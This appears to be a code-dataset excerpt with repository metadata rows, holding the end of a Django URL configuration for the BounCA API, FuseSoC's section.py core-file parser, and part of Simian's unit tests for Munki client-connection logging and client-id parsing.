url(r'^auth/', include(urlpatterns_rest_auth)),
url(r'^auth/registration/', include(urlpatterns_registration))
]
schema_view = get_swagger_view(title='BounCA API')
urlpatterns = [
url(r'^v1/', include(urlpatterns_apiv1)),
url(r'docs/', schema_view),
]
| apache-2.0 | 38,793,706,840,446,420 | 42.205882 | 115 | 0.720218 | false |
chiggs/fusesoc | fusesoc/section.py | 1 | 18237 | import os
from fusesoc.config import Config
from fusesoc import utils
from fusesoc.utils import Launcher, pr_warn, pr_info, unique_dirs
class File(object):
name = ""
file_type = ""
is_include_file = False
logical_name = ""
def __init__(self, s):
self.is_include_file = False
if s[-1:] == ']':
_tmp = s[:-1].split('[')
if(len(_tmp) != 2):
raise SyntaxError("Expected '['")
self.name = _tmp[0]
for _arg in [x.strip() for x in _tmp[1].split(',')]:
if _arg == "is_include_file":
self.is_include_file = True
elif '=' in _arg:
_tmp = [x.strip() for x in _arg.split('=')]
if _tmp[0] in ['file_type', 'logical_name']:
setattr(self, _tmp[0], _tmp[1])
else:
raise SyntaxError("Unexpected argument '"+_arg+"'")
else:
self.name = s
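# Illustrative sketch (not part of the original module): the parser above
# accepts entries of the form "name[arg, key=value, ...]", for example
#
#   File('pkg.vhd[file_type=vhdlSource, logical_name=mylib]')
#   File('defines.v[is_include_file]')
#
# while a plain string such as File('top.v') only sets the file name.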
class Error(Exception):
pass
class NoSuchItemError(Error):
pass
class UnknownSection(Error):
pass
class StringList(list):
def __new__(cls, *args, **kwargs):
if not args:
return list()
else:
return list(args[0].split())
class PathList(StringList):
def __new__(cls, *args, **kwargs):
if not args:
return list()
else:
return [os.path.expandvars(p) for p in args[0].split()]
class FileList(PathList):
    def __new__(cls, *args, **kwargs):
if not args:
return list()
else:
return [File(p) for p in PathList(args[0])]
class EnumList(list):
def __new__(cls, *args, **kwargs):
if not args:
return super(EnumList, cls).__new__(cls)
else:
values = kwargs['values']
_args = args[0].split()
for arg in _args:
if not arg in values:
raise ValueError("Invalid value '" + str(arg) + "'. Allowed values are '" + "', '".join(values)+"'")
return list(args[0].split())
class SimulatorList(EnumList):
def __new__(cls, *args, **kwargs):
values = ['icarus', 'modelsim', 'verilator', 'isim', 'xsim']
return super(SimulatorList, cls).__new__(cls, *args, values=values)
class SourceType(str):
def __new__(cls, *args, **kwargs):
if args:
arg = args[0]
values = ['C', 'CPP', 'systemC']
if arg in values:
return str(arg)
raise ValueError("Invalid value '" + str(arg) + "'. Allowed values are '" + "', '".join(values)+"'")
return str
class Section(object):
TAG = None
named = False
def __init__(self):
self._members = {}
self.export_files = []
self.warnings = []
def _add_member(self, name, _type, desc):
self._members[name] = {'type' : _type, 'desc' : desc}
setattr(self, name, _type())
def export(self):
return self.export_files
def load_dict(self, items):
for item in items:
if item in self._members:
_type = self._members.get(item)['type']
setattr(self, item, _type(items.get(item)))
else:
self.warnings.append(
'Unknown item "%(item)s" in section "%(section)s"' % {
'item': item, 'section': self.TAG})
def __str__(self):
s = ''
for k,v in self._members.items():
if isinstance(v.get('type'), list):
s += k + ' : ' + ';'.join(getattr(self, item)) + '\n'
elif isinstance(v.get('type'), str):
s += k + ' : ' + getattr(self, k) + '\n'
return s
class ScriptsSection(Section):
TAG = 'scripts'
def __init__(self, items=None):
super(ScriptsSection, self).__init__()
self._add_member('pre_build_scripts', StringList, 'Scripts to run before building')
self._add_member('pre_run_scripts' , StringList, 'Scripts to run before running simulations')
self._add_member('post_run_scripts' , StringList, 'Scripts to run after simulations')
if items:
self.load_dict(items)
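# Illustrative sketch (not part of the original module): each section maps
# config keys to typed members, so loading a dict such as
#
#   section = ScriptsSection({'pre_build_scripts': 'fetch.sh patch.sh'})
#
# leaves section.pre_build_scripts == ['fetch.sh', 'patch.sh'], while unknown
# keys are collected into section.warnings instead of raising an error.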
class ToolSection(Section):
def __init__(self):
super(ToolSection, self).__init__()
self._add_member('depend', StringList, "Tool-specific Dependencies")
class MainSection(Section):
TAG = 'main'
def __init__(self, items=None):
super(MainSection, self).__init__()
self._add_member('description', str, "Core description")
self._add_member('depend' , StringList, "Common dependencies")
        self._add_member('simulators' , SimulatorList, "Supported simulators. Valid values are icarus, modelsim, verilator, isim and xsim. Each simulator has a dedicated section described elsewhere in this document")
self._add_member('patches' , StringList, "FuseSoC-specific patches")
if items:
self.load_dict(items)
class VhdlSection(Section):
TAG = 'vhdl'
def __init__(self, items=None):
super(VhdlSection, self).__init__()
self._add_member('src_files', PathList, "VHDL source files for simulation and synthesis")
if items:
self.load_dict(items)
self.export_files = self.src_files
class VerilogSection(Section):
TAG = 'verilog'
def __init__(self, items=None):
super(VerilogSection, self).__init__()
self.include_dirs = []
self.tb_include_dirs = []
self._add_member('src_files' , FileList, "Verilog source files for synthesis/simulation")
self._add_member('include_files' , FileList, "Verilog include files")
self._add_member('tb_src_files' , FileList, "Verilog source files that are only used in simulation. Visible to other cores")
self._add_member('tb_private_src_files', FileList, "Verilog source files that are only used in the core's own testbench. Not visible to other cores")
self._add_member('tb_include_files' , FileList, "Testbench include files")
self._add_member('file_type' , str , "Default file type of the files in fileset")
if items:
self.load_dict(items)
if not self.file_type:
self.file_type = "verilogSource"
if self.include_files:
self.include_dirs += utils.unique_dirs(self.include_files)
if self.tb_include_files:
self.tb_include_dirs += utils.unique_dirs(self.tb_include_files)
self.export_files = self.src_files + self.include_files + self.tb_src_files + self.tb_include_files + self.tb_private_src_files
def __str__(self):
s = ""
if self.src_files: s += "\nRTL source files :\n {}".format('\n '.join(self.src_files))
if self.include_files: s += "\nRTL include files :\n {}".format('\n '.join(self.include_files))
if self.include_dirs: s += "\nRTL Include directories :\n {}".format('\n '.join(self.include_dirs))
if self.tb_src_files: s += "\nPublic testbench source files :\n {}".format('\n '.join(self.tb_src_files))
if self.tb_private_src_files: s += "\nPrivate testbench source files :\n {}".format('\n '.join(self.tb_private_src_files))
if self.tb_include_files: s += "\nTestbench include files :\n {}".format('\n '.join(self.tb_include_files))
if self.tb_include_dirs: s += "\nTestbench include directories :\n {}".format('\n '.join(self.tb_include_dirs))
return s
class FileSetSection(Section):
TAG = 'fileset'
named = True
def __init__(self, items=None):
super(FileSetSection, self).__init__()
self._add_member('files' , FileList, "List of files in fileset")
self._add_member('file_type' , str , "Default file type of the files in fileset")
self._add_member('is_include_file', str , "Specify all files in fileset as include files")
self._add_member('logical_name' , str , "Default logical_name (e.g. library) of the files in fileset")
self._add_member('scope' , str , "Visibility of fileset (private/public). Private filesets are only visible when this core is the top-level. Public filesets are visible also for cores that depend on this core. Default is public")
self._add_member('usage' , StringList, "List of tags describing when this fileset should be used. Can be general such as sim or synth, or tool-specific such as quartus, verilator, icarus")
if items:
self.load_dict(items)
for f in self.files:
if not f.file_type:
f.file_type = self.file_type
if self.is_include_file.lower() == "true":
f.is_include_file = True
if not f.logical_name:
f.logical_name = self.logical_name
self.export_files = self.files
class VpiSection(Section):
TAG = 'vpi'
def __init__(self, items=None):
super(VpiSection, self).__init__()
self.include_dirs = []
self._add_member('src_files' , FileList, "C source files for VPI library")
self._add_member('include_files', FileList, "C include files for VPI library")
self._add_member('libs' , StringList, "External libraries linked with the VPI library")
if items:
self.load_dict(items)
if self.include_files:
self.include_dirs += unique_dirs(self.include_files)
self.export_files = self.src_files + self.include_files
class ModelsimSection(ToolSection):
TAG = 'modelsim'
def __init__(self, items=None):
super(ModelsimSection, self).__init__()
self._add_member('vlog_options', StringList, "Additional arguments for vlog")
self._add_member('vsim_options', StringList, "Additional arguments for vsim")
if items:
self.load_dict(items)
class IcarusSection(ToolSection):
TAG = 'icarus'
def __init__(self, items=None):
super(IcarusSection, self).__init__()
self._add_member('iverilog_options', StringList, "Extra Icarus verilog compile options")
if items:
self.load_dict(items)
def __str__(self):
s = ""
if self.depend: s += "Icarus-specific dependencies : {}\n".format(' '.join(self.depend))
if self.iverilog_options: s += "Icarus compile options : {}\n".format(' '.join(self.iverilog_options))
return s
class IsimSection(ToolSection):
TAG = 'isim'
def __init__(self, items=None):
super(IsimSection, self).__init__()
self._add_member('isim_options', StringList, "Extra Isim compile options")
if items:
self.load_dict(items)
def __str__(self):
s = ""
if self.depend: s += "Isim-specific dependencies : {}\n".format(' '.join(self.depend))
if self.isim_options: s += "Isim compile options : {}\n".format(' '.join(self.isim_options))
return s
class XsimSection(ToolSection):
TAG = 'xsim'
def __init__(self, items=None):
super(XsimSection, self).__init__()
self._add_member('xsim_options', StringList, "Extra Xsim compile options")
if items:
self.load_dict(items)
def __str__(self):
s = ""
if self.depend: s += "Xsim-specific dependencies : {}\n".format(' '.join(self.depend))
if self.xsim_options: s += "Xsim compile options : {}\n".format(' '.join(self.xsim_options))
return s
class VerilatorSection(ToolSection):
TAG = 'verilator'
def __init__(self, items=None):
super(VerilatorSection, self).__init__()
self.include_dirs = []
self.archive = False
self._object_files = []
self._add_member('verilator_options', StringList, "Verilator build options")
self._add_member('src_files' , FileList , "Verilator testbench C/cpp/sysC source files")
self._add_member('include_files' , FileList , "Verilator testbench C include files")
self._add_member('define_files' , PathList , "Verilog include files containing `define directives to be converted to C #define directives in corresponding .h files")
self._add_member('libs' , PathList , "External libraries linked with the generated model")
self._add_member('tb_toplevel', str, 'Testbench top-level C/C++/SC file')
self._add_member('source_type', str, 'Testbench source code language (Legal values are systemC, C, CPP. Default is C)')
self._add_member('top_module' , str, 'verilog top-level module')
if items:
self.load_dict(items)
self.include_dirs = unique_dirs(self.include_files)
if self.src_files:
self._object_files = [os.path.splitext(os.path.basename(s.name))[0]+'.o' for s in self.src_files]
self.archive = True
self.export_files = self.src_files + self.include_files
def __str__(self):
s = """Verilator options : {verilator_options}
Testbench source files : {src_files}
Testbench include files : {include_files}
Testbench define files : {define_files}
External libraries : {libs}
Testbench top level : {tb_toplevel}
Testbench source type : {source_type}
Verilog top module : {top_module}
"""
return s.format(verilator_options=' '.join(self.verilator_options),
src_files = ' '.join(self.src_files),
include_files=' '.join(self.include_files),
define_files=' '.join(self.define_files),
libs=' '.join(self.libs),
tb_toplevel=self.tb_toplevel,
source_type=self.source_type,
top_module=self.top_module)
class IseSection(ToolSection):
TAG = 'ise'
def __init__(self, items=None):
super(IseSection, self).__init__()
self._add_member('ucf_files' , PathList, "UCF constraint files")
self._add_member('tcl_files' , PathList, "Extra TCL scripts")
self._add_member('family' , str, 'FPGA device family')
self._add_member('device' , str, 'FPGA device identifier')
self._add_member('package' , str, 'FPGA device package')
self._add_member('speed' , str, 'FPGA device speed grade')
self._add_member('top_module', str, 'RTL top-level module')
if items:
self.load_dict(items)
self.export_files = self.ucf_files
class QuartusSection(ToolSection):
TAG = 'quartus'
def __init__(self, items=None):
super(QuartusSection, self).__init__()
self._add_member('qsys_files', PathList, "Qsys IP description files")
self._add_member('sdc_files' , PathList, "SDC constraint files")
self._add_member('tcl_files' , PathList, "Extra script files")
self._add_member('quartus_options', str, 'Quartus command-line options')
self._add_member('family' , str, 'FPGA device family')
self._add_member('device' , str, 'FPGA device identifier')
self._add_member('top_module' , str, 'RTL top-level module')
if items:
self.load_dict(items)
self.export_files = self.qsys_files + self.sdc_files
class ParameterSection(Section):
TAG = 'parameter'
named = True
def __init__(self, items=None):
super(ParameterSection, self).__init__()
        self._add_member('datatype'   , str, 'Data type of argument (int, str, bool, file)')
self._add_member('description', str, 'Parameter description')
        self._add_member('paramtype'  , str, 'Type of parameter (plusarg, vlogparam, generic, cmdlinearg)')
self._add_member('scope' , str, 'Visibility of parameter. Private parameters are only visible when this core is the top-level. Public parameters are visible also when this core is pulled in as a dependency of another core')
if items:
self.load_dict(items)
def load_section(config, section_name, name='<unknown>'):
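    # Section names are either "<type>" or "<type> <name>" (e.g. "fileset sim_files");
    # named section types are returned as a (section, name) tuple further down.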
tmp = section_name.split(' ')
_type = tmp[0]
if len(tmp) == 2:
_name = tmp[1]
else:
_name = None
cls = SECTION_MAP.get(_type)
if cls is None:
        # Note: The following sections are not in section.py yet
        if section_name not in ['plusargs', 'simulator', 'provider']:
pr_warn("Unknown section '{}' in '{}'".format(section_name, name))
return None
items = config.get_section(section_name)
section = cls(items)
if section.warnings:
for warning in section.warnings:
pr_warn('Warning: %s in %s' % (warning, name))
if _name:
return (section, _name)
else:
return section
def load_all(config, name='<unknown>'):
for section_name in config.sections():
section = load_section(config, section_name, name)
if section:
yield section
SECTION_MAP = {}
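# Maps a section TAG string to its Section subclass; populated by
# _register_subclasses() below, which walks Section subclasses recursively.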
def _register_subclasses(parent):
for cls in parent.__subclasses__():
_register_subclasses(cls)
if cls.TAG is None:
continue
SECTION_MAP[cls.TAG] = cls
_register_subclasses(Section)
if __name__ == "__main__":
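    # Running this module directly prints an asciidoc-style table documenting
    # the members of every registered section type.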
typenames = {str : 'String',
FileList : 'Space-separated list of files',
PathList : 'Space-separated list of paths',
SimulatorList : 'Space-separated list',
SourceType : 'String',
StringList : 'Space-separated list',
list : 'List'}
SECTION_TEMPLATE = """
{}
{}
[cols="2,1,5",options="header"]
|==============================
|Name | Type | Description
{}
|==============================
"""
for k,v in sorted(SECTION_MAP.items()):
c = v()
s="\n".join(["|{} | {} | {}".format(k2, typenames[v2['type']], v2['desc']) for k2, v2 in sorted(c._members.items())])
print(SECTION_TEMPLATE.format(k, '-'*len(k), s))
| gpl-3.0 | 5,162,023,645,944,932,000 | 36.142566 | 250 | 0.570763 | false |
sillywilly42/simian | src/tests/simian/mac/munki/common_test.py | 1 | 48113 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Munki common module tests."""
import datetime
import logging
import tests.appenginesdk
from google.apputils import app
from tests.simian.mac.common import test
from simian.mac.munki import common
logging.basicConfig(filename='/dev/null')
class CommonModuleTest(test.RequestHandlerTest):
def GetTestClassInstance(self):
return self.mox.CreateMockAnything()
def GetTestClassModule(self):
return common
def testGetBoolValueFromString(self):
"""Tests GetBoolValueFromString() in various ways."""
self.assertTrue(common.GetBoolValueFromString('TrUe'))
self.assertTrue(common.GetBoolValueFromString('1'))
self.assertFalse(common.GetBoolValueFromString('FalSe'))
self.assertFalse(common.GetBoolValueFromString('0'))
self.assertEqual(common.GetBoolValueFromString(''), None)
self.assertEqual(common.GetBoolValueFromString(None), None)
def testSaveFirstConnectionWithSkipSerial(self):
"""Tests _SaveFirstConnection() with a serial in skip_serials = []."""
self.mox.StubOutWithMock(common.models, 'FirstClientConnection')
client_id = {
'uuid': 'uuid', 'owner': 'foouser', 'hostname': 'foohost',
'site': 'foosite'
}
class MockComputer(object):
serial = common.DUPE_SERIAL_NUMBER_EXCEPTIONS[0]
mock_computer = MockComputer()
mock_entity = self.mox.CreateMockAnything()
common.models.FirstClientConnection(key_name=client_id['uuid']).AndReturn(
mock_entity)
mock_entity.put().AndReturn(None)
self.mox.ReplayAll()
common._SaveFirstConnection(client_id, mock_computer)
self.assertEqual(mock_entity.computer, mock_computer)
self.assertEqual(mock_entity.owner, client_id['owner'])
self.assertEqual(mock_entity.hostname, client_id['hostname'])
self.assertEqual(mock_entity.site, client_id['site'])
self.mox.VerifyAll()
def testSaveFirstConnectionMarkingDupesInactive(self):
"""Tests _SaveFirstConnection(), marking dupe serial numbers as inactive."""
self.mox.StubOutWithMock(common.models, 'FirstClientConnection')
self.mox.StubOutWithMock(common.models.Computer, 'AllActive')
now = datetime.datetime.utcnow()
dupe_serial = 'fooserial'
client_id = {
'uuid': 'uuid', 'owner': 'foouser', 'hostname': 'foohost',
'site': 'foosite'
}
mock_computer = self.mox.CreateMockAnything()
mock_computer.uuid = 'this is a unique id'
mock_computer.preflight_datetime = now
mock_computer.serial = 'foobar serial'
mock_entity = self.mox.CreateMockAnything()
common.models.FirstClientConnection(key_name=client_id['uuid']).AndReturn(
mock_entity)
mock_entity.put().AndReturn(None)
dupe1 = self.mox.CreateMockAnything()
dupe1.uuid = 'diff'
dupe1.preflight_datetime = now - datetime.timedelta(days=0, minutes=1)
dupe1.serial = dupe_serial
dupe2 = self.mox.CreateMockAnything()
dupe2.uuid = 'diff again'
dupe2.preflight_datetime = now - datetime.timedelta(days=21)
dupe2.serial = dupe_serial
# same_serials contains mock_computer, but put() shouldn't be called again.
same_serials = [mock_computer, dupe1, dupe2]
mock_query = self.mox.CreateMockAnything()
common.models.Computer.AllActive().AndReturn(mock_query)
mock_query.filter('serial =', mock_computer.serial).AndReturn(same_serials)
dupe1.put(update_active=False).AndReturn(None)
dupe2.put(update_active=False).AndReturn(None)
self.mox.ReplayAll()
common._SaveFirstConnection(client_id, mock_computer)
self.assertTrue(mock_computer.active)
self.assertFalse(dupe1.active)
self.assertFalse(dupe2.active)
self.mox.VerifyAll()
def testLogClientConnectionWithInvalidUuid(self):
"""Tests LogClientConnection() function with an invalid uuid."""
client_id = {'uuid': ''}
event = 'custom'
self.mox.StubOutWithMock(common.logging, 'warning')
common.logging.warning(
'LogClientConnection: uuid is unknown, skipping log')
self.mox.ReplayAll()
common.LogClientConnection(event, client_id)
self.mox.VerifyAll()
def testLogClientConnectionPreflight(self):
"""Tests LogClientConnection() function."""
user_settings = {'foo': True}
event = 'preflight'
uuid = 'foo-uuid'
hostname = 'foohostname'
serial = 'serial'
owner = 'foouser'
track = 'footrack'
config_track = 'footrack'
site = 'NYC'
os_version = '10.6.3'
client_version = '0.6.0.759.0'
on_corp = True
last_notified_datetime_str = '2010-11-03 15:15:10'
last_notified_datetime = datetime.datetime(2010, 11, 03, 15, 15, 10)
uptime = 123
root_disk_free = 456
user_disk_free = 789
ip_address = 'fooip'
runtype = 'auto'
report_feedback = {'force_continue': True}
client_id = {
'uuid': uuid, 'hostname': hostname, 'serial': serial, 'owner': owner,
'track': track, 'config_track': config_track, 'os_version': os_version,
'client_version': client_version, 'on_corp': on_corp,
'last_notified_datetime': last_notified_datetime_str,
'site': site, 'uptime': uptime,
'root_disk_free': root_disk_free, 'user_disk_free': user_disk_free,
'runtype': runtype,
}
connection_datetimes = range(1, common.CONNECTION_DATETIMES_LIMIT + 1)
connection_dates = range(1, common.CONNECTION_DATES_LIMIT + 1)
# bypass the db.run_in_transaction step
self.stubs.Set(
common.models.db, 'run_in_transaction',
lambda fn, *args, **kwargs: fn(*args, **kwargs))
mock_computer = self.MockModelStatic('Computer', 'get_by_key_name', uuid)
mock_computer.connection_datetimes = connection_datetimes
mock_computer.connection_dates = connection_dates
mock_computer.connections_on_corp = 2
mock_computer.connections_off_corp = 2
mock_computer.preflight_count_since_postflight = 3
mock_computer.put().AndReturn(None)
self.mox.ReplayAll()
common.LogClientConnection(
event, client_id, user_settings=user_settings, ip_address=ip_address,
report_feedback=report_feedback)
self.assertEquals(uuid, mock_computer.uuid)
self.assertEquals(ip_address, mock_computer.ip_address)
self.assertEquals(runtype, mock_computer.runtype)
self.assertEquals(hostname, mock_computer.hostname)
self.assertEquals(serial, mock_computer.serial)
self.assertEquals(owner, mock_computer.owner)
self.assertEquals(track, mock_computer.track)
self.assertEquals(config_track, mock_computer.config_track)
self.assertEquals(site, mock_computer.site)
self.assertEquals(os_version, mock_computer.os_version)
self.assertEquals(client_version, mock_computer.client_version)
self.assertEquals(
last_notified_datetime, mock_computer.last_notified_datetime)
# Verify on_corp/off_corp counts.
self.assertEquals(2, mock_computer.connections_on_corp)
self.assertEquals(2, mock_computer.connections_off_corp)
self.assertEquals(
datetime.datetime, type(mock_computer.last_on_corp_preflight_datetime))
self.assertEquals(4, mock_computer.preflight_count_since_postflight)
self.mox.VerifyAll()
def testLogClientConnectionPostflight(self):
"""Tests LogClientConnection() function."""
event = 'postflight'
uuid = 'foo-uuid'
ip_address = 'fooip'
hostname = 'foohostname'
serial = 'serial'
owner = 'foouser'
track = 'footrack'
config_track = 'footrack'
site = 'NYC'
os_version = '10.6.3'
client_version = '0.6.0.759.0'
on_corp = True
last_notified_datetime_str = '2010-11-03 15:15:10'
last_notified_datetime = datetime.datetime(2010, 11, 03, 15, 15, 10)
uptime = 123
root_disk_free = 456
user_disk_free = 789
runtype = 'custom'
client_id = {
'uuid': uuid, 'hostname': hostname, 'serial': serial, 'owner': owner,
'track': track, 'config_track': config_track, 'os_version': os_version,
'client_version': client_version, 'on_corp': on_corp,
'last_notified_datetime': last_notified_datetime_str,
'site': site, 'uptime': uptime,
'root_disk_free': root_disk_free, 'user_disk_free': user_disk_free,
'runtype': runtype,
}
pkgs_to_install = ['FooApp1', 'FooApp2']
apple_updates_to_install = ['FooUpdate1', 'FooUpdate2']
all_pkgs_to_install = pkgs_to_install + [
common.APPLESUS_PKGS_TO_INSTALL_FORMAT % update
for update in apple_updates_to_install]
connection_datetimes = range(1, common.CONNECTION_DATETIMES_LIMIT + 1)
connection_dates = range(1, common.CONNECTION_DATES_LIMIT + 1)
# bypass the db.run_in_transaction step
self.stubs.Set(
common.models.db, 'run_in_transaction',
lambda fn, *args, **kwargs: fn(*args, **kwargs))
mock_computer = self.mox.CreateMockAnything()
mock_computer.connection_datetimes = connection_datetimes
mock_computer.connection_dates = connection_dates
mock_computer.connections_on_corp = None # test (None or 0) + 1
mock_computer.connections_off_corp = 0
mock_computer.put().AndReturn(None)
self.mox.ReplayAll()
common.LogClientConnection(
event, client_id, pkgs_to_install=pkgs_to_install,
apple_updates_to_install=apple_updates_to_install,
computer=mock_computer, ip_address=ip_address)
self.assertEquals(uuid, mock_computer.uuid)
self.assertEquals(ip_address, mock_computer.ip_address)
self.assertEquals(runtype, mock_computer.runtype)
self.assertEquals(hostname, mock_computer.hostname)
self.assertEquals(serial, mock_computer.serial)
self.assertEquals(owner, mock_computer.owner)
self.assertEquals(track, mock_computer.track)
self.assertEquals(config_track, mock_computer.config_track)
self.assertEquals(site, mock_computer.site)
self.assertEquals(os_version, mock_computer.os_version)
self.assertEquals(client_version, mock_computer.client_version)
self.assertEquals(
last_notified_datetime, mock_computer.last_notified_datetime)
# Verify that the first "datetime" was popped off.
self.assertEquals(connection_datetimes[0], 2)
# Verify that the last datetime is the new datetime.
new_datetime = connection_datetimes[common.CONNECTION_DATETIMES_LIMIT - 1]
self.assertEquals(type(new_datetime), datetime.datetime)
# Verify that the first "date" was popped off.
self.assertEquals(connection_dates[0], 2)
# Verify that the last date is the new date.
new_date = connection_dates[common.CONNECTION_DATES_LIMIT - 1]
self.assertEquals(type(new_date), datetime.datetime)
# Verify on_corp/off_corp counts.
self.assertEquals(1, mock_computer.connections_on_corp)
self.assertEquals(0, mock_computer.connections_off_corp)
self.assertEquals(all_pkgs_to_install, mock_computer.pkgs_to_install)
self.assertEquals(False, mock_computer.all_pkgs_installed)
self.assertEquals(0, mock_computer.preflight_count_since_postflight)
self.mox.VerifyAll()
def testLogClientConnectionPreflightAndNew(self):
"""Tests LogClientConnection() function."""
event = 'preflight'
uuid = 'foo-uuid'
ip_address = 'fooip'
hostname = 'foohostname'
serial = 'fooserial'
owner = 'foouser'
track = 'footrack'
config_track = 'footrack'
site = 'NYC'
os_version = '10.6.3'
client_version = '0.6.0.759.0'
on_corp = True
last_notified_datetime_str = '2010-11-03 15:15:10'
last_notified_datetime = datetime.datetime(
2010, 11, 03, 15, 15, 10)
uptime = 123
root_disk_free = 456
user_disk_free = 789
runtype = 'auto'
client_id = {
'uuid': uuid, 'hostname': hostname, 'serial': serial, 'owner': owner,
'track': track, 'config_track': config_track, 'os_version': os_version,
'client_version': client_version, 'on_corp': on_corp,
'last_notified_datetime': last_notified_datetime_str,
'site': site, 'uptime': uptime,
'root_disk_free': root_disk_free, 'user_disk_free': user_disk_free,
'runtype': runtype,
}
# bypass the db.run_in_transaction step
self.stubs.Set(
common.models.db, 'run_in_transaction',
lambda fn, *args, **kwargs: fn(*args, **kwargs))
self.MockModelStaticNone('Computer', 'get_by_key_name', uuid)
mock_computer = self.MockModel('Computer', key_name=uuid)
self.mox.StubOutWithMock(common.deferred, 'defer')
mock_computer.connection_datetimes = []
mock_computer.connection_dates = []
mock_computer.connections_on_corp = None
mock_computer.connections_off_corp = None
mock_computer.preflight_count_since_postflight = None
mock_computer.put().AndReturn(None)
common.deferred.defer(
common._SaveFirstConnection,
client_id=client_id, computer=mock_computer, _countdown=300,
_queue='first')
self.mox.ReplayAll()
common.LogClientConnection(event, client_id, ip_address=ip_address)
self.assertEquals(uuid, mock_computer.uuid)
self.assertEquals(ip_address, mock_computer.ip_address)
self.assertEquals(runtype, mock_computer.runtype)
self.assertEquals(hostname, mock_computer.hostname)
self.assertEquals(serial, mock_computer.serial)
self.assertEquals(owner, mock_computer.owner)
self.assertEquals(track, mock_computer.track)
self.assertEquals(config_track, mock_computer.config_track)
self.assertEquals(site, mock_computer.site)
self.assertEquals(os_version, mock_computer.os_version)
self.assertEquals(client_version, mock_computer.client_version)
self.assertEquals(
last_notified_datetime, mock_computer.last_notified_datetime)
# New client, so zero connection date/datetimes until after postflight.
self.assertEquals([], mock_computer.connection_datetimes)
self.assertEquals([], mock_computer.connection_dates)
# Verify on_corp/off_corp counts.
self.assertEquals(None, mock_computer.connections_on_corp)
self.assertEquals(None, mock_computer.connections_off_corp)
self.assertEquals(1, mock_computer.preflight_count_since_postflight)
self.mox.VerifyAll()
def testLogClientConnectionAsync(self):
"""Tests calling LogClientConnection(delay=2)."""
event = 'eventname'
client_id = {'uuid': 'fooo'}
ip_address = 'fooip'
utcnow = datetime.datetime(2010, 9, 2, 19, 30, 21, 377827)
self.mox.StubOutWithMock(datetime, 'datetime')
self.stubs.Set(common.deferred, 'defer', self.mox.CreateMockAnything())
deferred_name = 'log-client-conn-%s-%s' % (
client_id['uuid'], '2010-09-02-19-30-21')
common.datetime.datetime.utcnow().AndReturn(utcnow)
common.deferred.defer(
common.LogClientConnection, event, client_id, user_settings=None,
pkgs_to_install=None, apple_updates_to_install=None,
ip_address=ip_address, report_feedback=None,
_name=deferred_name, _countdown=2, cert_fingerprint=None)
self.mox.ReplayAll()
common.LogClientConnection(event, client_id, delay=2, ip_address=ip_address)
self.mox.VerifyAll()
def testKeyValueStringToDict(self):
"""Tests the KeyValueStringToDict() function."""
s = 'key=value::none=None::true=True::false=False'
expected_d = {
'key': 'value', 'none': None, 'true': 'True', 'false': 'False'}
d = common.KeyValueStringToDict(s, delimiter='::')
self.assertEqual(d, expected_d)
def _GetClientIdTestData(self):
"""Returns client id test data."""
client_id_str = (
'uuid=6c3327e9-6405-4f05-8374-142cbbd260c9|owner=foouser|'
'hostname=foohost|serial=1serial2|config_track=fooconfigtrack|track=%s|'
'os_version=10.6.3|client_version=0.6.0.759.0|on_corp=0|'
'last_notified_datetime=2010-01-01|site=NYC|'
'uptime=123.0|root_disk_free=456|user_disk_free=789|applesus=false|'
'runtype=auto|mgmt_enabled=true'
)
client_id_dict = {
u'uuid': u'6c3327e9-6405-4f05-8374-142cbbd260c9',
u'owner': u'foouser',
u'hostname': u'foohost',
u'serial': u'1serial2',
u'config_track': u'fooconfigtrack',
u'site': u'NYC',
u'os_version': u'10.6.3',
u'client_version': u'0.6.0.759.0',
u'on_corp': False,
u'last_notified_datetime': u'2010-01-01',
u'uptime': 123.0,
u'root_disk_free': 456,
u'user_disk_free': 789,
u'applesus': False,
u'runtype': 'auto',
u'mgmt_enabled': True,
}
return client_id_str, client_id_dict
def testParseClientIdWithUnicode(self):
"""Tests ParseClientId with some unicode characters."""
client_id_str, client_id_dict = self._GetClientIdTestData()
# Convert the client_id_str to unicode.
client_id_unicode = client_id_str.decode('utf-8')
# Replace foohost with a unicode O with umlaut, surrounded by zz.
    client_id_unicode = client_id_unicode.replace('foohost', u'zz\u00D6zz')
cid = client_id_unicode % u'stable'
client_id_dict[u'track'] = u'stable'
client_id_dict[u'hostname'] = u'zz\xd6zz'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdNoneBool(self):
"""Tests ParseClientId with on_corp=<missing>."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace('on_corp=0', 'on_corp=')
client_id_dict['on_corp'] = None
cid = client_id_str % 'stable'
client_id_dict['track'] = 'stable'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdNewline(self):
"""Tests ParseClientId when newline in the string."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace(
'hostname=foohost', 'hostname=foo\nhost')
client_id_dict['hostname'] = 'foo_host'
cid = client_id_str % 'stable'
client_id_dict['track'] = 'stable'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdOnCorp(self):
"""Tests ParseClientId with on_corp=1."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace('on_corp=0', 'on_corp=1')
client_id_dict['on_corp'] = True
cid = client_id_str % 'stable'
client_id_dict['track'] = 'stable'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdWithAppleSusTrue(self):
"""Tests ParseClientId with applesus=true."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace('applesus=false', 'applesus=true')
client_id_dict['applesus'] = True
cid = client_id_str % 'stable'
client_id_dict['track'] = 'stable'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdWithValidClientIdAllValidTracks(self):
"""Tests ParseClientId() with a valid client id; tests all valid tracks."""
client_id_str, client_id_dict = self._GetClientIdTestData()
for track in common.common.TRACKS:
cid = client_id_str % track
client_id_dict['track'] = track
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdWithUuidOverride(self):
"""Tests ParseClientId() with uuid override."""
